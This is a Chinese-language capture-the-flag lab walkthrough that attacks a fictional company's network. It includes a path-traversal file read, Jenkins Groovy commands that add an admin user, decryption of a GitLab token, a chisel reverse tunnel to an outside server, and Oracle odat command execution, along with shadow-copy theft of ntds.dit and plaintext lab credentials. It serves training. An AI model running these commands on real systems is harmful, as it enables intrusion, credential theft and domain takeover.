文章目录
靶标介绍:
在这个靶场中,您将扮演一名资深黑客,被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用,并通过后渗透技巧深入 XR Shop 的内部网络,寻找潜在的弱点和漏洞,并通过滥用 Windows 特权获取管理员权限,最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag,分布于不同的靶机。
考点
- 信息泄露
- Jenkins初始管理员密码
- jenkins后台RCE
- Gitlab API Token
- Oracle RCE
- SeRestorePrivilege提权
- SPN
- 卷影拷贝提取SAM
题目给的一些相关信息
第一关
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins。
第二关
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
第三关
攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
第四关
尝试接管备份管理操作员帐户,并通过转储 NTDS 获得域管理员权限,最终控制整个域环境。
知识点
卷影拷贝(VSS)
利用 SeBackupPrivilege特权通过卷影拷贝读取系统受保护文件
VSS 是 Windows 提供的功能,用于创建文件系统的快照(snapshot),包括正在使用的文件。
SeBackupPrivilege 允许用户创建卷影拷贝并访问快照中的文件,即使这些文件在正常情况下被锁定或受 ACL 限制。
通过 VSS,可以读取 SAM 文件的副本,而无需直接访问原始文件。
一般利用步骤
- 创建并上传卷影拷贝脚本
本地创建 raj.dsh,写入以下内容
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
脚本作用: 生成 C 盘的卷影拷贝并将其挂载为 Z: 盘
set context persistent nowriters
- 设置卷影拷贝为持久模式(persistent),确保快照不会在脚本结束后自动删除
- nowriters 避免备份过程中被写入操作干扰(如数据库文件正在被修改)
add volume c: alias raj
- 指定 C 盘为卷影拷贝的目标,并给快照取别名 raj。
create
- 执行创建卷影拷贝的操作,生成 C 盘的快照。
expose %raj% z:
- 将快照挂载为 Z: 盘,允许访问快照中的文件系统。
使用 unix2dos 转换格式
unix2dos raj.dsh
unix2dos 转换脚本的换行符格式,从 Unix 风格(LF)转换为 Windows 风格(CRLF),确保脚本在 Windows 环境中正确执行。
- 执行卷影拷贝
diskshadow /s raj.dsh
运行 diskshadow 工具,执行 raj.dsh 脚本,创建 C 盘的卷影拷贝并挂载为 Z: 盘
- 复制文件 (比如域控服务器里面的
ntds.dit文件)
RoboCopy /b z:\windows\ntds . ntds.dit
使用 RoboCopy 工具,以备份模式(/b)从卷影拷贝(Z: 盘)的 Z:\Windows\NTDS 目录复制 ntds.dit 文件到当前目录
RoboCopy:Windows 的高级文件复制工具,支持备份模式和 ACL 处理。
/b:备份模式,利用 SeBackupPrivilege 绕过文件 ACL 和锁定,允许复制受保护文件
z:\windows\ntds:源路径
.: 表示当前目录
ntds.dit: 要复制的具体文件
ntds.dit 是 Active Directory 的核心数据库,存储域内所有对象的信息,包括:
用户账户(用户名、SID、NTLM 哈希、Kerberos 密钥等)。
计算机账户。
组和权限信息。
外网
任意文件读取
fscan扫描一下
发现80端口wordpress的站点有源码泄露, 下载下来审计一下, 可以发现存在一个任意文件读取漏洞, 没有任何过滤
尝试读取flag (可以后面rdp登录后直接拿)
/tools/content-log.php?logfile=../../../../../../../../../Users\Administrator\flag\flag01.txt
根据第一关的提示, 读取Jenkins的密码, 告诉了Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins
在 Jenkins 的默认配置中,初始管理员密码存储在 Jenkins 配置目录下的 secrets 子目录中的 initialAdminPassword 文件中
所以需要读取文件 C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
/tools/content-log.php?logfile=../../../../../../../../../ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
拿到密码: 510235cf43f14e83b88a9f144199655b
Jenkins管理员后台
拿到了密码就可以登录其8080端口了(fscan可以扫出来)
admin / 510235cf43f14e83b88a9f144199655b
jenkins在manage/script 路径下提供了一个脚本控制台,允许管理员在 Jenkins 实例上执行脚本代码, 常用的语言是 Groovy, 也能执行shell命令
http://39.99.129.242:8080/manage/script
权限很高
添加一个管理员用户, 方便rdp登录上去
println("net user xpw 123qwe! /add".execute().text)
println("net localgroup administrators xpw /add".execute().text)
rdp远程登录
传个fscan上去扫描一下内网 (用windows远程桌面连接默认共享c盘文件, 直接把工具放在这上面就行)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.7 存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.11 存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.16 存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.31 存活 (ICMP)
[2025-05-14 01:22:11] [SUCCESS] 目标 172.22.14.46 存活 (ICMP)
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.7
主机名: XR-JENKINS
发现的网络接口:
IPv4地址:
└─ 172.22.14.7
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7 状态码:200 长度:54603 标题:XR SHOP
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.46 状态码:200 长度:703 标题:IIS Windows Server
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.31
主机名: XR-ORACLE
发现的网络接口:
IPv4地址:
└─ 172.22.14.31
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.11
主机名: XR-DC
发现的网络接口:
IPv4地址:
└─ 172.22.14.11
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.7:8080 状态码:403 长度:548 标题:无标题
[2025-05-14 01:23:21] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.46
主机名: XR-0923
发现的网络接口:
IPv4地址:
└─ 172.22.14.46
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.46 XIAORANG\XR-0923
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[2025-05-14 01:23:21] [SUCCESS] NetBios 172.22.14.11 DC:XIAORANG\XR-DC
[2025-05-14 01:23:21] [SUCCESS] 网站标题 http://172.22.14.16 状态码:302 长度:99 标题:无标题 重定向地址: http://172.22.14.16/users/sign_in
[2025-05-14 01:23:22] [SUCCESS] 网站标题 http://172.22.14.16:8060 状态码:404 长度:555 标题:404 Not Found
[2025-05-14 01:23:27] [SUCCESS] 检测到漏洞 http://172.22.14.7:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
172.22.14.7 本机,已最高权限
172.22.14.46 XIAORANG\XR-0923
172.22.14.11 DC:XIAORANG\XR-DC
172.22.14.31 WORKGROUP\XR-ORACLE
172.22.14.16 GitLab
Gitlab apiToken
根据题目里面的描述
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
寻找api token,翻看一下它配置目录下的一些文件去找
C:/ProgramData/Jenkins/.jenkins/credentials.xml
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
这个文件里面可以找到apiToken
AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh
回jenkins脚本控制台那里解密一下, 参考如何从credentials.xml中解密Jenkins密码 - bestsrc
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
得到明文
glpat-7kD_qLH2PiQv_ywB9hz2
接下来可以利用这个token访问gitlab的一些信息
内网
搭建代理
先利用chisel搭建代理
服务端(vps)
./chisel server -p 8888 --reverse
客户端(受控主机)
chisel.exe client 8.154.17.163:8888 R:0.0.0.0:9383:socks
Oracle RCE
用API列出有权限访问的项目
proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]
把一些项目克隆下来看看
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账号和密码
可以通过navicat连接数据库查看, 不过可能会出现一些报错, 可以通过这篇文章解决
https://blog.csdn.net/qq_38974638/article/details/115069664
但也可以不需要连接上去, 可以通过odat直接执行命令,xradmin用户具有 SYSDBA 权限
odat是一个专门用于渗透测试 Oracle 数据库的开源工具
添加管理员账户方便远程连接rdp上去
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user xpw 123qwe! /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators xpw /add'
dbmsscheduler是odat的一个模块,利用 Oracle 的DBMS_SCHEDULER包,这个包允许创建调度任务,这些任务可以在数据库服务器上运行 shell 命令(如果权限足够)`
-s: 指定数据库服务器
-p: 指定端口
-d: 指定数据库 SID(系统标识符)或服务名称
